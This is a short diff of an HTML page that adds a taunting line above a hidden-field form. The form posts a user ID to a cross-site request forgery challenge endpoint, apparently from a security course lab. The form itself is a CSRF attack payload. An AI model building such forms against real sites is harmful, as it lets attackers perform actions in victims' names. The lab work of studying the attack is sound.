--- a/index.html
+++ b/index.html
@@ -1,3 +1,4 @@
+<p>You just got rekt!</p>
 <form name="csrfForm" action="https://security.codepath.com/user/csrfchallengetwo/plusplus" method="POST">
   <input type="hidden" name="userId" value="4b07dd65d0f30fdd6c00b417f2e981065795cdcb"/>
   <input type="submit"/>
